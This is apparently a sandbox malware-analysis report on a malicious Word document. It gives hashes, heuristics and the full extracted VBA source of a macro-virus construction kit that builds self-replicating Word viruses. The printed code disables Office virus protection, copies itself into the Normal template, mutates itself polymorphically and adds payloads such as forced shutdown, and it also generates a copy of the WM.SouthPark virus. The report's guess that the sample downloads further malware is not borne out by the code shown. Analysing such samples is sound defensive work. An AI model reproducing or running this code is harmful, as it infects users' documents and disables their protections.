Office (OLE) malware analysis — malicious · e18c1d7638752ff7

MALICIOUS

Office (OLE)

270.0 KB Created: 2001-05-25 17:47:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 2ea78fe2621c4919b77b5ea35499f4c5 SHA-1: bc282edd108864ce165436e5fb4e9594058438f7 SHA-256: e18c1d7638752ff736ac0cb3a9cdbd859a95baf859663b9fec4360e3e175cc7c

176 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Auto_Close functions. The AutoOpen macro triggers the display of UserForm1, which in turn can show UserForm2. The script comments indicate it was created by './System Failure\.', suggesting a potential developer or project name. The presence of AutoOpen and the execution of shell commands via VBA indicate a malicious intent to execute code, likely to download and run additional malware.

Heuristics 6

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Print #1, "Options.VirusProtection = False"
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Print #1, "Sub AutoClose()"
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15283 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15283 bytes
SHA-256: `9bab52f24c39530f90eefb9f52124fd29bf1a76c6f07d8f86adf4d9cd5d732c3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{7A945495-4DF9-4EA6-9671-509366677544}{BD993DCB-D8DF-448A-954A-39BA0B4EF7E4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UserForm2.Show End Sub Private Sub CommandButton2_Click() UserForm1.Hide End Sub Attribute VB_Name = "MAIN" Sub AutoOpen() UserForm1.Show End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{4CBE7859-8AE5-49FC-81F8-13546EC66B9C}{4AFDFC9C-4A2A-469E-8093-31EE13114A1B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False 'Kit creato da ./System Failure\. 'Distribute!! Private Sub Disclaimer_Click() MsgBox "Questo programma è stato creato solo per scopo educativo" & vbCrLf & _ "e non mi ritengo responsabile di problemi arrecati a voi ed a altri" & vbCrLf & _ "./System Failure\.", vbInformation MsgBox "This program is for educational purpose only." & vbCrLf & _ "I take no responsabiliy for any damage caused for" & vbCrLf & _ "the files created whit this program to anything." End Sub Private Sub CommandButton1_Click() On Error GoTo Err If CheckBox1 And CheckBox2 And CheckBox3 And CheckBox4 And CheckBox5 = True Then MsgBox "Selezionare una sola Funzione e un solo Metodo", vbOKOnly, "./System Failure\." GoTo Err End If If CheckBox8 = True And CheckBox9 = True Then MsgBox "Selezionare un solo Metodo", vbOKOnly, "./System Failure\." GoTo Err ElseIf CheckBox8 = False And CheckBox9 = False Then MsgBox "Selezionare un Metodo", vbOKOnly, "./System Failure\." GoTo Err End If If CheckBox8 = True And CheckBox9 = False Or CheckBox8 = False And CheckBox9 = True Then End If If CheckBox1 = True Then Open "c:\x.bas" For Output As #1 Print #1, "Attribute VB_Name = ""SysFail""" Print #1, "Sub AutoOpen()" Close #1 End If If CheckBox2 = True Then Open "c:\x.bas" For Output As #1 Print #1, "Attribute VB_Name = ""SysFail""" Print #1, "Sub AutoExec()" Close #1 End If If CheckBox3 = True Then Open "c:\x.bas" For Output As #1 Print #1, "Attribute VB_Name = ""SysFail""" Print #1, "Sub AutoClose()" Close #1 End If If CheckBox4 = True Then Open "c:\x.bas" For Output As #1 Print #1, "Attribute VB_Name = ""SysFail""" Print #1, "Sub FileSave()" Close #1 End If If CheckBox5 = True Then Open "c:\x.bas" For Output As #1 Print #1, "Attribute VB_Name = ""SysFail""" Print #1, "Sub FilePrint()" Close #1 End If If CheckBox6 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = True Then Open "c:\x.bas" For Append As #1 Print #1, "'This code has been written by ./System Failure\." Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit" Print #1, "'This file is for educational purpose only." Print #1, "'I take no responsabiliy for any damage caused for" Print #1, "'the files created with this program to anything." Print #1, "On Error Resume Next" Print #1, "Options.VirusProtection = False" Print #1, "Options.SaveNormalPrompt = False" Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").Export ""c:\Defrag.Log""" Print #1, "For I = 1 To NormalTemplate.VBProject.VBComponents.Count" Print #1, "If NormalTemplate.VBProject.VBComponents(I).Name = ""SysFail"" Then NormInstall = True" Print #1, "Next I" Print #1, "For I = 1 To ActiveDocument.VBProject.VBComponents.Count" Print #1, "If ActiveDocument.VBProject.VBComponents(I).Name = ""SysFail"" Then ActivInstall = True" Print #1, "Next I" Print #1, "If ActivInstall = True And NormInstall = False Then Set Sys = NormalTemplate.VBProject" Print #1, "If ActivInstall = False And NormInstall = True Then Set Sys = ActiveDocument.VBProject" Print #1, "Sys.VBComponents.Import (""c:\Defrag.Log"")" Print #1, "ActiveDocument.SaveAs FileName:=Activedocument.Fullname, FileFormat:=WdFormatDocument" Print #1, "Call Polymorphic" Print #1, "Call Msg" Print #1, "End Sub" Close #1 ElseIf CheckBox6 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = False Then Open "c:\x.bas" For Append As #1 Print #1, "'This code has been written by ./System Failure\." Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit" Print #1, "'This file is for educational purpose only." Print #1, "'I take no responsabiliy for any damage caused for" Print #1, "'the files created whit this program to anything." Print #1, "On Error Resume Next" Print #1, "Options.VirusProtection = False" Print #1, "Options.SaveNormalPrompt = False" Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").Export ""c:\Defrag.Log""" Print #1, "For I = 1 To NormalTemplate.VBProject.VBComponents.Count" Print #1, "If NormalTemplate.VBProject.VBComponents(I).Name = ""SysFail"" Then NormInstall = True" Print #1, "Next I" Print #1, "For I = 1 To ActiveDocument.VBProject.VBComponents.Count" Print #1, "If ActiveDocument.VBProject.VBComponents(I).Name = ""SysFail"" Then ActivInstall = True" Print #1, "Next I" Print #1, "If ActivInstall = True And NormInstall = False Then Set Sys = NormalTemplate.VBProject" Print #1, "If ActivInstall = False And NormInstall = True Then Set Sys = ActiveDocument.VBProject" Print #1, "Sys.VBComponents.Import (""c:\Defrag.Log"")" Print #1, "ActiveDocument.SaveAs FileName:=Activedocument.Fullname, FileFormat:=WdFormatDocument" Print #1, "Call Polymorphic" Print #1, "End Sub" Close #1 End If If CheckBox10 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = True Then Open "C:\x.bas" For Append As #1 Print #1, "'This code has been written by ./System Failure\." Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit" Print #1, "'This file is for educational purpose only." Print #1, "'I take no responsabiliy for any damage caused for" Print #1, "'the files created whit this program to anything." Print #1, "On error resume next" Print #1, "Options.VirusProtection = False" Print #1, "Options.SaveNormalPrompt = False" Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count" Print #1, "For i = 1 To iMacroCount" Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SysFail"" Then" Print #1, "SysFailInstalled = -1" Print #1, "End If" Print #1, "Next i" Print #1, "If Not SysFailInstalled Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SysFail"", Object:=wdOrganizerObjectProjectItems" Print #1, "End if" Print #1, "Call Msg" Print #1, "End sub" Close #1 ElseIf CheckBox10 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = False Then Open "C:\x.bas" For Append As #1 Print #1, "'This code has been written by ./System Failure\." Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit" Print #1, "'This file is for educational purpose only." Print #1, "'I take no responsabiliy for any damage caused for" Print #1, "'the files created whit this program to anything." Print #1, "On error resume next" Print #1, "Options.VirusProtection = False" Print #1, "Options.SaveNormalPrompt = False" Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count" Print #1, "For i = 1 To iMacroCount" Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SysFail"" Then" Print #1, "SysFailInstalled = -1" Print #1, "End If" Print #1, "Next i" Print #1, "If Not SysFailInstalled Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SysFail"", Object:=wdOrganizerObjectProjectItems" Print #1, "End if" Print #1, "End sub" Close #1 End If If CheckBox8 = True Then Open "c:\x.bas" For Append As #1 Print #1, "Sub Polymorphic() 'Poly by ./System Failure\." Print #1, "PoLy1 = Int(Rnd() * 20 + 1)" Print #1, "For MutATiOn = 1 To PoLy1" Print #1, "PoLy2 = Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.CountOfLines" Print #1, "PoLy3 = Int(Rnd() * PoLy2 + 1)" Print #1, "PoLy4 = Int(Rnd() * 40 + 1)" Print #1, "For PoLy6 = 1 To PoLy4" Print #1, "PoLy = Int((120 - 100 + 1) * Rnd + 228)" Print #1, "PoLy5 = PoLy5 + Chr$(PoLy)" Print #1, "Next PoLy6" Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.InsertLines PoLy3, vbTab & "" & PoLy5" Print #1, "PoLy5 = """ Print #1, "Next MutATiOn" Print #1, "End Sub" Print #1, "" Close #1 End If If CheckBox9 = True Then Open "c:\x.bas" For Append As #1 Print #1, "Function Polymorphic() 'Poly by VicodinES" Print #1, "a = Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.CountOfLines" Print #1, "With Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule" Print #1, "For x = 2 To a Step 2" Print #1, ".ReplaceLine x, "" & Application.UserInitials & Now & Application.UserName & Application.ActivePrinter & Now" Print #1, "Next x" Print #1, "End With" Print #1, "End Function" Print #1, "" Close #1 End If If CheckBox12 = True Then If CheckBox11 = True Then Three = TextBox3.Text Open "c:\x.bas" For Append Access Write As #1 Print #1, "Sub ViewVBCode() " Print #1, "Assistant.Visible = True" Print #1, "With Assistant.NewBallon" Print #1, ".Button = msoButtonSetOK" Print #1, ".Heading =""./System Failure\.""" Print #1, ".Text = """ & Three & """" Print #1, ".Show" Print #1, "End With" Print #1, "End Sub" Close #1 End If If CheckBox14 = True Then Open "c:\x.bas" For Append As #1 Print #1, "Sub ViewVBCode() " Print #1, "MsgBox ""This is a macro virus made with SFVCK!!"", vbOKOnly, ""Virus!!""" Print #1, "End Sub" Close #1 End If If CheckBox15 = True Then Open "c:\x.bas" For Append As #1 Print #1, "Sub ViewVBCode() " Print #1, "MsgBox ""Error at 3FFH:11DD"", vbOKOnly, ""Microsoft Word""" Print #1, "End Sub" Close #1 End If End If If CheckBox16 = True Then One = TextBox1.Text Two = TextBox2.Text Open "C:\x.bas" For Append Access Write As #1 Print #1, "Sub Msg()" Print #1, "If Day(Now) = " & Two & "Then" Print #1, "Msgbox """ & One & """" Print #1, "End if" Print #1, "End Sub" Close #1 End If If CheckBox17 = True Then Open "C:\x.bas" For Append Access Write As #1 Print #1, "Sub Msg()" Print #1, "ActiveDocument.PrintOut" Print #1, "End Sub" Close #1 End If If CheckBox18 = True Then Open "C:\x.bas" For Append Access Write As #1 Print #1, "Sub Msg()" Print #1, "Tasks.ExitWindows" Print #1, "End Sub" Close #1 End If If CheckBox19 = True Then Three = TextBox10 Four = TextBox11 Open "C:\x.bas" For Append Access Write As #1 Print #1, "Sub Msg()" Print #1, "If Day(Now) =" & Four & " then" Print #1, "Selection.TypeText Text:=" & Three & "" Print #1, "End If" Print #1, "End Sub" Close #1 End If If CheckBox20 = True Then Five = TextBox4 Six = TextBox5 Seven = TextBox6 Eight = TextBox7 Nine = TextBox8 Ten = TextBox9 Eleven = TextBox13 Twelve = TextBox14 Open "C:\x.bas" For Append Access Write As #1 Print #1, "Sub Msg()" Print #1, Five Print #1, Six Print #1, Seven Print #1, Eight Print #1, Nine Print #1, Ten Print #1, Eleven Print #1, Twelve Print #1, "End Sub" Close #1 End If Documents.Add ActiveDocument.VBProject.VBComponents.Import ("c:\x.bas") ActiveDocument.SaveAs FileName:="c:\Vir1", FileFormat:=wdFormatDocument ActiveDocument.Close MsgBox "Virus Salvato nel Documento c:\vir1.doc", vbInformation, "./System Failure\." Kill "c:\x.bas" Err: End Sub Private Sub CommandButton5_Click() MsgBox "Selezionare Un solo Metodo", vbInformation, "./System Failure\." End Sub Private Sub CommandButton3_Click() MsgBox "Selezionare il metodo di infezione Exp-Imp /StringCopy e una delle Funzioni", vbInformation, "./System Failure\." MsgBox "Selezionare il metodo di Polimorfismo", vbInformation, "./System Failure\." MsgBox "Selezionare il Payload ", vbInformation, "./System Failure\." MsgBox "Selezionare il modo (in grassetto) e un solo evento (sottostante il modo) ", vbInformation, "./System Failure\." MsgBox "Quando le schede sono state compilate creare il virus", vbInformation, "./System Failure\." End Sub Private Sub CommandButton4_Click() ok = MsgBox("Creare una copia di WM.SouthPark?", vbOKCancel, "/.System Failure\.") If ok = vbOK Then Open "C:\Southpark.bas" For Output As #1 Print #1, "Attribute VB_Name = ""SouthPark""" Print #1, "This program is for educational purpose only." Print #1, "I take no responsabiliy for any damage caused for" Print #1, "the files created whit this program to anything." Print #1, "Sub AutoOpen()" Print #1, "On Error Resume Next" Print #1, "Options.VirusProtection = False" Print #1, "Options.SaveNormalPrompt = False" Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count" Print #1, "For i = 1 To iMacroCount" Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SouthPark"" Then" Print #1, "SouthInstalled = -1" Print #1, "End If" Print #1, "Next i" Print #1, "If Not SouthInstalled Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SouthPark"", Object:=wdOrganizerObjectProjectItems" Print #1, "End If" Print #1, "Call Datex" Print #1, "Call StealthRoutine" Print #1, "End Sub" Print #1, "Sub StealthRoutine()" Print #1, "CommandBars(""Tools"").Controls(""Macro"").Visible = False" Print #1, "CommandBars(""Tools"").Controls(""Templates and Add-Ins..."").Visible = False" Print #1, "Options.VirusProtection = False" Print #1, "Options.SaveNormalPrompt = False" Print #1, "End Sub" Print #1, "Sub Datex()" Print #1, "If Day(Now) = 3 Then" Print #1, "MsgBox ""Hello!!I 'm STAN! I went from SouthParK!!"", vbInformation, ""./System Failure\.""" Print #1, "End Sub" Print #1, "Sub ToolsMacro()" Print #1, "End Sub" Print #1, "Sub FileTemplate" Print #1, "End Sub" Print #1, "' Written by ./System Failure\." Close #1 End If Documents.Add ActiveDocument.VBProject.VBComponents.Import ("C:\Southpark.bas") ActiveDocument.SaveAs FileName:="c:\Sp", FileFormat:=wdFormatDocument ActiveDocument.Close MsgBox "Virus Salvato nel Documento c:\sp.doc", vbInformation, "./System Failure\." Kill "c:\x.bas" End Sub Private Sub MultiPage1_Change() End Sub

SHA-256: 9bab52f24c39530f90eefb9f52124fd29bf1a76c6f07d8f86adf4d9cd5d732c3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{7A945495-4DF9-4EA6-9671-509366677544}{BD993DCB-D8DF-448A-954A-39BA0B4EF7E4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub CommandButton1_Click()
UserForm2.Show
End Sub

Private Sub CommandButton2_Click()
UserForm1.Hide
End Sub


Attribute VB_Name = "MAIN"
Sub AutoOpen()
UserForm1.Show

End Sub



Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4CBE7859-8AE5-49FC-81F8-13546EC66B9C}{4AFDFC9C-4A2A-469E-8093-31EE13114A1B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'Kit creato da ./System Failure\.
'Distribute!!
Private Sub Disclaimer_Click()
MsgBox "Questo programma è stato creato solo per scopo educativo" & vbCrLf & _
       "e non mi ritengo responsabile di problemi arrecati a voi ed a altri" & vbCrLf & _
       "./System Failure\.", vbInformation
MsgBox "This program is for educational purpose only." & vbCrLf & _
    "I take no responsabiliy for any damage caused for" & vbCrLf & _
    "the files created whit this program to anything."
End Sub
Private Sub CommandButton1_Click()
On Error GoTo Err
If CheckBox1 And CheckBox2 And CheckBox3 And CheckBox4 And CheckBox5 = True Then
MsgBox "Selezionare una sola Funzione e un solo Metodo", vbOKOnly, "./System Failure\."
GoTo Err
End If
If CheckBox8 = True And CheckBox9 = True Then
MsgBox "Selezionare un solo Metodo", vbOKOnly, "./System Failure\."
GoTo Err
ElseIf CheckBox8 = False And CheckBox9 = False Then
MsgBox "Selezionare un Metodo", vbOKOnly, "./System Failure\."
GoTo Err
End If
If CheckBox8 = True And CheckBox9 = False Or CheckBox8 = False And CheckBox9 = True Then
End If

If CheckBox1 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub AutoOpen()"
Close #1
End If

If CheckBox2 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub AutoExec()"
Close #1
End If

If CheckBox3 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub AutoClose()"
Close #1
End If

If CheckBox4 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub FileSave()"
Close #1
End If

If CheckBox5 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub FilePrint()"
Close #1
End If

If CheckBox6 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = True Then
Open "c:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created with this program to anything."
Print #1, "On Error Resume Next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").Export ""c:\Defrag.Log"""
Print #1, "For I = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, "If NormalTemplate.VBProject.VBComponents(I).Name = ""SysFail"" Then NormInstall = True"
Print #1, "Next I"
Print #1, "For I = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, "If ActiveDocument.VBProject.VBComponents(I).Name = ""SysFail"" Then ActivInstall = True"
Print #1, "Next I"
Print #1, "If ActivInstall = True And NormInstall = False Then Set Sys = NormalTemplate.VBProject"
Print #1, "If ActivInstall = False And NormInstall = True Then Set Sys = ActiveDocument.VBProject"
Print #1, "Sys.VBComponents.Import (""c:\Defrag.Log"")"
Print #1, "ActiveDocument.SaveAs FileName:=Activedocument.Fullname, FileFormat:=WdFormatDocument"
Print #1, "Call Polymorphic"
Print #1, "Call Msg"
Print #1, "End Sub"
Close #1

ElseIf CheckBox6 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = False Then
Open "c:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created whit this program to anything."
Print #1, "On Error Resume Next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").Export ""c:\Defrag.Log"""
Print #1, "For I = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, "If NormalTemplate.VBProject.VBComponents(I).Name = ""SysFail"" Then NormInstall = True"
Print #1, "Next I"
Print #1, "For I = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, "If ActiveDocument.VBProject.VBComponents(I).Name = ""SysFail"" Then ActivInstall = True"
Print #1, "Next I"
Print #1, "If ActivInstall = True And NormInstall = False Then Set Sys = NormalTemplate.VBProject"
Print #1, "If ActivInstall = False And NormInstall = True Then Set Sys = ActiveDocument.VBProject"
Print #1, "Sys.VBComponents.Import (""c:\Defrag.Log"")"
Print #1, "ActiveDocument.SaveAs FileName:=Activedocument.Fullname, FileFormat:=WdFormatDocument"
Print #1, "Call Polymorphic"
Print #1, "End Sub"
Close #1
End If


If CheckBox10 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = True Then
Open "C:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created whit this program to anything."
Print #1, "On error resume next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count"
Print #1, "For i = 1 To iMacroCount"
Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SysFail"" Then"
Print #1, "SysFailInstalled = -1"
Print #1, "End If"
Print #1, "Next i"
Print #1, "If Not SysFailInstalled Then"
Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SysFail"", Object:=wdOrganizerObjectProjectItems"
Print #1, "End if"
Print #1, "Call Msg"
Print #1, "End sub"
Close #1

ElseIf CheckBox10 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = False Then
Open "C:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created whit this program to anything."
Print #1, "On error resume next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count"
Print #1, "For i = 1 To iMacroCount"
Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SysFail"" Then"
Print #1, "SysFailInstalled = -1"
Print #1, "End If"
Print #1, "Next i"
Print #1, "If Not SysFailInstalled Then"
Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SysFail"", Object:=wdOrganizerObjectProjectItems"
Print #1, "End if"
Print #1, "End sub"
Close #1
End If

If CheckBox8 = True Then
Open "c:\x.bas" For Append As #1
Print #1, "Sub Polymorphic() 'Poly by ./System Failure\."
Print #1, "PoLy1 = Int(Rnd() * 20 + 1)"
Print #1, "For MutATiOn = 1 To PoLy1"
Print #1, "PoLy2 = Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.CountOfLines"
Print #1, "PoLy3 = Int(Rnd() * PoLy2 + 1)"
Print #1, "PoLy4 = Int(Rnd() * 40 + 1)"
Print #1, "For PoLy6 = 1 To PoLy4"
Print #1, "PoLy = Int((120 - 100 + 1) * Rnd + 228)"
Print #1, "PoLy5 = PoLy5 + Chr$(PoLy)"
Print #1, "Next PoLy6"
Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.InsertLines PoLy3, vbTab & "" & PoLy5"
Print #1, "PoLy5 = """
Print #1, "Next MutATiOn"
Print #1, "End Sub"
Print #1, ""
Close #1
End If

If CheckBox9 = True Then
Open "c:\x.bas" For Append As #1
Print #1, "Function Polymorphic() 'Poly by VicodinES"
Print #1, "a = Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.CountOfLines"
Print #1, "With Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule"
Print #1, "For x = 2 To a Step 2"
Print #1, ".ReplaceLine x, "" & Application.UserInitials & Now & Application.UserName & Application.ActivePrinter & Now"
Print #1, "Next x"
Print #1, "End With"
Print #1, "End Function"
Print #1, ""
Close #1
End If

If CheckBox12 = True Then
    If CheckBox11 = True Then
    Three = TextBox3.Text
    Open "c:\x.bas" For Append Access Write As #1
    Print #1, "Sub ViewVBCode() "
    Print #1, "Assistant.Visible = True"
    Print #1, "With Assistant.NewBallon"
    Print #1, ".Button = msoButtonSetOK"
    Print #1, ".Heading =""./System Failure\."""
    Print #1, ".Text = """ & Three & """"
    Print #1, ".Show"
    Print #1, "End With"
    Print #1, "End Sub"
    Close #1
    End If
    
    If CheckBox14 = True Then
    Open "c:\x.bas" For Append As #1
    Print #1, "Sub ViewVBCode() "
    Print #1, "MsgBox ""This is a macro virus made with SFVCK!!"", vbOKOnly, ""Virus!!"""
    Print #1, "End Sub"
    Close #1
    End If
    
    If CheckBox15 = True Then
    Open "c:\x.bas" For Append As #1
    Print #1, "Sub ViewVBCode() "
    Print #1, "MsgBox ""Error at 3FFH:11DD"", vbOKOnly, ""Microsoft Word"""
    Print #1, "End Sub"
    Close #1
    End If
End If

If CheckBox16 = True Then
    One = TextBox1.Text
    Two = TextBox2.Text
   Open "C:\x.bas" For Append Access Write As #1
   Print #1, "Sub Msg()"
   Print #1, "If Day(Now) = " & Two & "Then"
   Print #1, "Msgbox """ & One & """"
   Print #1, "End if"
   Print #1, "End Sub"
   Close #1
End If

If CheckBox17 = True Then
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, "ActiveDocument.PrintOut"
    Print #1, "End Sub"
    Close #1
End If

If CheckBox18 = True Then
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, "Tasks.ExitWindows"
    Print #1, "End Sub"
    Close #1
End If

If CheckBox19 = True Then
    Three = TextBox10
    Four = TextBox11
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, "If Day(Now) =" & Four & " then"
    Print #1, "Selection.TypeText Text:=" & Three & ""
    Print #1, "End If"
    Print #1, "End Sub"
    Close #1
End If

If CheckBox20 = True Then
    Five = TextBox4
    Six = TextBox5
    Seven = TextBox6
    Eight = TextBox7
    Nine = TextBox8
    Ten = TextBox9
    Eleven = TextBox13
    Twelve = TextBox14
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, Five
    Print #1, Six
    Print #1, Seven
    Print #1, Eight
    Print #1, Nine
    Print #1, Ten
    Print #1, Eleven
    Print #1, Twelve
    Print #1, "End Sub"
    Close #1
End If


Documents.Add
ActiveDocument.VBProject.VBComponents.Import ("c:\x.bas")
ActiveDocument.SaveAs FileName:="c:\Vir1", FileFormat:=wdFormatDocument
ActiveDocument.Close
MsgBox "Virus Salvato nel Documento c:\vir1.doc", vbInformation, "./System Failure\."
Kill "c:\x.bas"
Err:

End Sub
Private Sub CommandButton5_Click()
MsgBox "Selezionare Un solo Metodo", vbInformation, "./System Failure\."
End Sub


Private Sub CommandButton3_Click()
